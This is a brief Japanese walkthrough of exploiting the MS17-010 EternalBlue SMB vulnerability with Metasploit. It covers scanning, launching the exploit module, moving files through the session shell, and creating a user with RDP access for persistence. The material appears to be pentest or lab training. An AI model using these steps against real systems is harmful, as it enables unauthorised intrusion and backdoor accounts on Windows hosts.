Metasploit Framework の使用#
-
msfconsole
コマンドを実行し、msf ターミナルに入る -
ms17-010 関連モジュールを検索する
-
auxiliary/scanner/smb/smb_ms17_010
モジュールを使用してスキャンする
-
exploit/windows/smb/ms17_010_eternalblue
モジュールを使用して脆弱性を利用する
-
脆弱性利用に成功したらシェルに入る。
help
コマンドを使用するとサポートされているコマンドを確認できる
よく使うコマンド:
lcd
ローカルディレクトリを切り替える
lls
ローカルファイルをブラウズする
cd
リモートディレクトリを切り替える
ls
リモートファイルをブラウズする
upload ローカルファイル リモート位置
ファイルをアップロードする
shell
リモートシェルを呼び出す
cmd ではnet
コマンドを使用してユーザーを作成し、rdp アクセス権を追加できます